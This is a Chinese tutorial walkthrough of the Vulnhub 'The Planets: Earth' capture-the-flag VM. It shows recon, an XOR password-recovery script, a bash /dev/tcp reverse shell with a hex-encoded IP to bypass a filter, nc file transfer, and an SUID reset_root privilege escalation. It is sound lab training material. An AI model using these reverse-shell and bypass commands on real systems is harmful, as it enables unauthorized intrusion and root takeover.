AI 助理
文档备案控制台
开发者社区 安全 文章 正文

看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth

2023-10-30 763
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth

e2ba74fa8b9d4b9b9b4bbcdb4798a196.png2d9acbde09a34e2ea441c6f47acf859c.pngVulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机,老样子需要找到flag即可。


Vulnhub靶机下载:

官方下载:https://download.vulnhub.com/theplanets/Earth.ova

Vulnhub靶机安装:


下载好了把安装包解压 然后使用Oracle VM打开即可。


Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机


渗透机:kali IP :192.168.0.102 靶机IP :192.168.0.105

使用命令:nmap -sS -sV -A -n -p- 192.168.0.105


发现开启了22、80、443 老样子先访问80发现400报错,修改hosts文件vim /etc/hosts

192.168.0.105 earth.local terratest.earth.local #然后访问earth.local



Message输入随便的字符 下面的数字会进行加密 dirb扫一下后台发现/admin/发现需要账号密码,尝试暴力破解无果!



25b77e027f5a4370b8a1dc2a5a3b99d6.png


接着扫另一个https域名: dirb https://terratest.earth.local发现了robots.txt进行访问


  1. 加密算法是XOR(异或)
  2. testdata.txt是加密文件
  3. terra是管理员的用户名
wget https://terratest.earth.local/testdata.txt --no-check-certificate ##下载密文


2d9acbde09a34e2ea441c6f47acf859c.png

import base64
import binascii
data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
#data1中的数据为https://earth.local页面中最下面一行数据的内容 如果不确定是哪个可以都试试 只有这个数据可以异或出来有效数据
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
#(open('a.txt', 'rb') rb参数表示获取到的是 testdata.txt中内容的16进制 其整体结果为2进制的表现形式。testdata.txt 是上一步扫描获取到的信息 可以复制出来 也可以 使用命令:wget https://terratest.earth.local/testdata.txt --no-check-certificate 
#binascii.b2a_hex 把二进制形式的16进制字符串转换为16进制的形式 
res=hex(int(data1,16) ^ int(f,16)) #&与 |或 ^异或 ~非 >>右移  <<左移  异或的时候需要知道必须要与加密文件大小相同
print(res) #输出异或运算后的16进制字符串

23679e09e3754868ba9f02ecb4feab2d.png

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174   #这一串有密码

16进制在线转字符串:https://www.bejson.com/convert/ox2str/

现在知道了账号:terra和密码:earthclimatechangebad4humans 尝试登入, 登入成功!!!


②:命令执行:

发现可以直接命令执行,直接看看能不能找flag find / -name "*flag*"查看源码这样方便看点 cat /var/earth_web/user_flag.txt


这里其实可以直接反弹shell了 但是显示被禁止所以需要绕过 把ip进行16进制编码即可完成绕过 然后就回弹了shell

在线转换地址:http://www.tbfl.store/net/ip.html

/var/earth_web/secure_message/forms.py #这个文件限制了ip
nc -lvvp 4444
bash -i >& /dev/tcp/192.168.0.102/4444 0>&1
bash -i >& /dev/tcp/0Xc0a80066/4444 0>&1



eb407c18927e4e05b54fb0f4d9d20774.png


ea806a864305442f8a966c7c3503b5e2.png


95d6f84c79a84ff4b38af4082d741291.png

bb10dbf7c5464d91b7d4c6cdd15351e3.png


③:提权:

使用命令: find / -perm -u=s -type f 2>/dev/null有个/usr/bin/reset root 可以使用


使用命令:strings /usr/bin/reset_root 可以看到这个可执行文件将root的密码修改为Earth

nc -lvnp 6666 > reset_root  #监听6666端口接收文件
nc 192.168.0.102 6666 < /usr/bin/reset_root  #ip是本机ip
chmod 777 #kali里面给权限
apt-get install strace  #安装strace工具
strace -f -F ./reset_root  #检测跟踪进程 发现少了三个文件

e2ba74fa8b9d4b9b9b4bbcdb4798a196.png

1ed8022c1077478f9ab102ff3d6ee312.png

在靶机上用touch命令创建文件,创建完成后再执行/usr/bin/reset_root执行成功,显示root的密码被修改成了Earth

touch /tmp/kcM0Wewe
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
cd /usr/bin
./reset_root  #然后密码就会修改为Earth 切换用户即可


78860d374e104985afbc136f3fb87538.png

④:获取FLAG:

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!


Vulnhub靶机渗透总结:

这个靶机难度中等吧


1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等 查看F12源码信息

2.修改hosts文件完成DNS解析 路径:/etc/hosts 通过异或算法脚本获取密码 strace 工具得使用(第一次使用!)

3.通过nc bash 反弹shell (新知识点,被限制了可以通过16进制进行绕过!)

4.最后就是提权,通过新建文件执行脚本 重置root密码


The Planets系列得第一个靶机,学习到了很多知识点又是收获满满的一天(耶耶耶!)

最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

文章标签:
网络安全
数据安全/隐私保护
Shell
安全
算法
关键词:
测试靶机
渗透测试靶机
渗透测试vulnhub
测试靶机vulnhub
渗透测试靶机vulnhub
落寞的鱼
目录
相关文章
GG2020gg
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
GG2020gg
262 4
GG2020gg
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
GG2020gg
371 4
GG2020gg
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
GG2020gg
242 2
GG2020gg
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
GG2020gg
598 0
GG2020gg
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
GG2020gg
380 0
蓝易云
|
11月前
|
Java 测试技术 容器
Jmeter工具使用:HTTP接口性能测试实战
希望这篇文章能够帮助你初步理解如何使用JMeter进行HTTP接口性能测试,有兴趣的话,你可以研究更多关于JMeter的内容。记住,只有理解并掌握了这些工具,你才能充分利用它们发挥其应有的价值。+
蓝易云
1537 23
油梨子
|
SQL 安全 测试技术
2025接口测试全攻略:高并发、安全防护与六大工具实战指南
本文探讨高并发稳定性验证、安全防护实战及六大工具(Postman、RunnerGo、Apipost、JMeter、SoapUI、Fiddler)选型指南,助力构建未来接口测试体系。接口测试旨在验证数据传输、参数合法性、错误处理能力及性能安全性,其重要性体现在早期发现问题、保障系统稳定和支撑持续集成。常用方法包括功能、性能、安全性及兼容性测试,典型场景涵盖前后端分离开发、第三方服务集成与数据一致性检查。选择合适的工具需综合考虑需求与团队协作等因素。
油梨子
2041 24
handsome0916
|
SQL 测试技术
除了postman还有什么接口测试工具
最好还是使用国内的接口测试软件,其实国内替换postman的软件有很多,这里我推荐使用yunedit-post这款接口测试工具来代替postman,因为它除了接口测试功能外,在动态参数的支持、后置处理执行sql语句等支持方面做得比较好。而且还有接口分享功能,可以生成接口文档给团队在线浏览。
handsome0916
656 2
游客4ajxjr2o23cj2
|
监控 API 开发工具
Socket.IO介绍,以及怎么连接测试Socket.IO接口?
Socket.IO 是一个用于浏览器和服务器间实时双向通信的库,支持低延迟消息传递、跨平台运行及自动重连。文章介绍了其特点与调试需求,并详细说明如何使用 Apifox 工具创建、连接、发送/接收 Socket.IO 事件,以及团队协作和调试技巧。掌握这些技能可提升实时应用开发效率与质量。
游客4ajxjr2o23cj2
924 0
爱专研的技术土狗
|
存储 JSON API
Python测试淘宝店铺所有商品接口的详细指南
本文详细介绍如何使用Python测试淘宝店铺商品接口,涵盖环境搭建、API接入、签名生成、请求发送、数据解析与存储、异常处理等步骤。通过具体代码示例,帮助开发者轻松获取和分析淘宝店铺商品数据,适用于电商运营、市场分析等场景。遵守法规、注意调用频率限制及数据安全,确保应用的稳定性和合法性。
爱专研的技术土狗
560 4

热门文章

最新文章

  • 1
    JAVA架构网站安全漏洞渗透测试检测手法
  • 2
    看完这篇 教你玩转渗透测试靶机vulnhub——DC3
  • 3
    暗渡陈仓:用低消耗设备进行破解和渗透测试第3章 安装一个基础操作系统
  • 4
    渗透测试-Openssl心脏出血漏洞复现
  • 5
    看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:1
  • 6
    渗透测试——xss-labs环境部署
  • 7
    渗透测试之网站后台风控安全测试
  • 8
    深入Kali Linux:高级渗透测试技术详解
  • 9
    如何使用Kali Linux进行渗透测试?
  • 10
    看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:2
  • 1
    Burp Suite Professional 2025.10 for Windows x64 - 领先的 Web 渗透测试软件
    344
  • 2
    Metasploit Pro 4.22.8-20251014 (Linux, Windows) - 专业渗透测试框架
    401
  • 3
    Metasploit Framework 6.4.95 (macOS, Linux, Windows) - 开源渗透测试框架
    828
  • 4
    Metasploit Pro 4.22.8-2025091701 (Linux, Windows) - 专业渗透测试框架
    486
  • 5
    Metasploit Framework 6.4.90 (macOS, Linux, Windows) - 开源渗透测试框架
    549
  • 6
    Kali Linux 2025.3 发布 (Vagrant & Nexmon) - 领先的渗透测试发行版
    841
  • 7
    Metasploit Framework 6.4.88 (macOS, Linux, Windows) - 开源渗透测试框架
    667
  • 8
    Metasploit Pro 4.22.8-2025082101 (Linux, Windows) - 专业渗透测试框架
    307
  • 9
    Metasploit Pro 4.22.8-2025073001 (Linux, Windows) - 专业渗透测试框架
    241
  • 10
    Metasploit Pro 4.22.7-2025061201 (Linux, Windows) - 专业渗透测试框架
    377

    • 相关课程

    更多
  • MSE微服务测试最佳实践 - 自动化回归
  • 网络安全攻防 - Web渗透测试

    • 相关电子书

    更多
  • ICA安全标准组测试认证分享
  • MaxCompute基于BigBench标准的最新测试进展
  • 用AI高效测试移动应用
    • 下一篇
    阿里云正式发布 Agentic 代码安全:AI驱动的双Agent协同引擎